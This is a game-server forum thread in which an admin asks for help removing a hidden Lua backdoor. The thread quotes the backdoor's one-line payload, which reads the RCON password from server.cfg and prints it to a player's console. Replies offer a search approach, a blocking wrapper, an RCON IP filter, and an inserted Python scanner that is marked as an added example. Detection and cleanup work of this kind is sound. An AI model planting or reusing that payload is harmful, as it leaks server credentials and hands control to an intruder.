• Someone has put a suspicious code on my server
    17 replies, posted
Well, there's this guy (let's call him "Ass") who had temporary access to my FTP and hid some code in it; that code gives him the Rcon. I managed to find the command that prints the rcon:
[lua]
player.GetByID(3):PrintMessage(HUD_PRINTCONSOLE, string.sub(file.Read("../cfg/server.cfg"), 1, 200))
[/lua]
Please help.
delete it?
It's HIDDEN somewhere in the Lua files, I don't know which one obviously.
Open all Lua files in Notepad++. Search in all files for "server.cfg".
I use FileZilla and ... well I can't do that.
Yes you can. You can select Lua files to be opened by Notepad++ by default. Select the files in FileZilla, right-click and view/edit, or something.
It would take DAYS... There are a lot of addons on my server, too many Lua files...
Days? I don't think so. But either take the time, or let him have control of your server.
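The "search in all files" step suggested above can be automated on a local copy of the server's files. The script below is an added example, not part of the original thread; the `rcon_password` pattern and the handling of strings split with `..` are assumptions that go slightly beyond the plain "server.cfg" search.

```python
import re
import sys
from pathlib import Path

# What to flag. "server.cfg" and the "../" file.Read path come from the thread;
# "rcon_password" is an added assumption about what else is worth reviewing.
SUSPICIOUS = {
    "server.cfg reference": re.compile(r"server\.cfg", re.I),
    "rcon_password reference": re.compile(r"rcon_password", re.I),
    "file.Read with ../ path": re.compile(r"""file\.Read\s*\(\s*["']\.\./"""),
}

# Matches the seam between two concatenated Lua string literals: "ser" .. "ver"
CONCAT = re.compile(r"""["']\s*\.\.\s*["']""")


def normalize(line):
    """Join adjacent string literals so split-up strings still match."""
    return CONCAT.sub("", line)


def scan_text(text, name="<text>"):
    """Return (file, line number, label, source line) for every match."""
    hits = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = normalize(raw)
        for label, rx in SUSPICIOUS.items():
            if rx.search(line):
                hits.append((name, lineno, label, raw.strip()))
    return hits


def scan_tree(root):
    """Scan every .lua file under root (e.g. a local copy of the server)."""
    hits = []
    for path in sorted(Path(root).rglob("*.lua")):
        text = path.read_text(encoding="utf-8", errors="replace")
        hits.extend(scan_text(text, str(path)))
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(sys.argv[1])
    else:
        # Constructed sample: the string is split to dodge a plain text search.
        results = scan_text('local p = "../cfg/ser" .. "ver.cfg"\nfile.Read(p)', "sample.lua")
    for name, lineno, label, src in results:
        print(f"{name}:{lineno}: {label}: {src}")
```

A static search like this misses strings that are only assembled at runtime, so an empty result does not prove the files are clean.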
A quick and dirty fix to block that file.Read command until you find its location: (save in lua/includes/enums/!.lua and reload the map)
[lua]
require('file')
require('debug')

local file = file
local debug = debug
local FileRead = file.Read          -- keep a reference to the original function
local DebugGetinfo = debug.getinfo

-- Replace the global file.Read with a wrapper that refuses to read server.cfg
function _G.file.Read(Path, User)
    if Path == "../cfg/server.cfg" then
        -- Stack level 2 is the code that called file.Read
        local Backdoor = DebugGetinfo(2, "S").short_src
        Msg("************************************\n")
        Msg("************************************\n")
        Msg("Found backdoor at " .. Backdoor .. "!\n")
        Msg("************************************\n")
        Msg("************************************\n")
        return "nope";
    end
    return FileRead(Path, User)
end
[/lua]
Thanks!
[QUOTE=q3k;26606909]A quick and dirty fix to block that file.Read command until you find its location: (save in lua/includes/enums/!.lua and reload the map)
[lua]
require('file')
require('debug')

local file = file
local debug = debug
local FileRead = file.Read
local DebugGetinfo = debug.getinfo

function _G.file.Read(Path, User)
    if Path == "../cfg/server.cfg" then
        local Backdoor = DebugGetinfo(2, "S").short_src
        Msg("************************************\n")
        Msg("************************************\n")
        Msg("Found backdoor at " .. Backdoor .. "!\n")
        Msg("************************************\n")
        Msg("************************************\n")
        return "nope";
    end
    return FileRead(Path, User)
end
[/lua][/QUOTE]
They can bypass that.
[QUOTE=Snatch932;26607862]They can bypass that.[/QUOTE] No shit, Cubar. Too bad you missed the "quick and dirty" part.
By the way, could someone check if that file (that works with the Rcon protector (.dll))
[lua]
require( "rcon" )

-- Reject RCON password attempts that do not come from the allowed IP
hook.Add("RCON_CheckPassword", "MultiPass", function( pass, ip, port )
    if ( ip != "MyIp" ) then
        for _, ply in ipairs( player.GetAll() ) do
            -- plain find (4th argument) so the dots in the IP are not pattern wildcards
            if ( string.find( ply:IPAddress(), ip, 1, true ) ) then
                ply:Kick( "Nice try..." )
                break
            end
        end
        return false
    end
end )

-- Reject RCON data requests that do not come from the allowed IP
hook.Add("RCON_WriteDataRequest", "ProcessData", function( id, request, data, ip, port )
    if ( ip != "MyIp" ) then
        for _, ply in ipairs( player.GetAll() ) do
            if ( string.find( ply:IPAddress(), ip, 1, true ) ) then
                ply:Kick( "Nice try..." )
                break
            end
        end
        return false
    end
end )

RCON_RestrictedCommands = {"lua_run"}
[/lua]
[QUOTE=Snatch932;26607862]They can bypass that.[/QUOTE] It's not a permanent block, it's so he can find out what file is doing it.
[QUOTE=Tiagos360;26607934]By the way, could someone check if that file (that works with the Rcon protector (.dll)[/QUOTE]
This just limits rcon to be accessible only from --snip--. Is this your IP?
Yeah, but the problem is that the Ass can use the Rcon... (please don't show my ip ^^)